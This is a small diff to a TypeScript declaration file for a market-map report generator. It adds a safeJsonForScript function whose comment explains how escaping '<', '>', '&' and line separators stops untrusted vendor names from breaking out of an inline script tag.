@@ -1,3 +1,12 @@
1
1
  import type { MarketConfig, ObservationSet } from "./market.ts";
2
+ /**
3
+ * Serialize JSON for embedding inside an inline <script> block. JSON.stringify
4
+ * does not escape `<`, `>`, `&`, or the U+2028/U+2029 line separators, so a
5
+ * vendor name containing `</script>` (these are untrusted, competitor-authored
6
+ * strings) would close the tag and inject markup. Replacing them with their
7
+ * \uXXXX escapes keeps the parsed value identical while making the breakout
8
+ * sequence unrepresentable in the HTML source.
9
+ */
10
+ export declare function safeJsonForScript(value: unknown): string;
2
11
  export declare function marketMapToMarkdown(config: MarketConfig, set: ObservationSet): string;
3
12
  export declare function marketMapToHtml(config: MarketConfig, set: ObservationSet): string;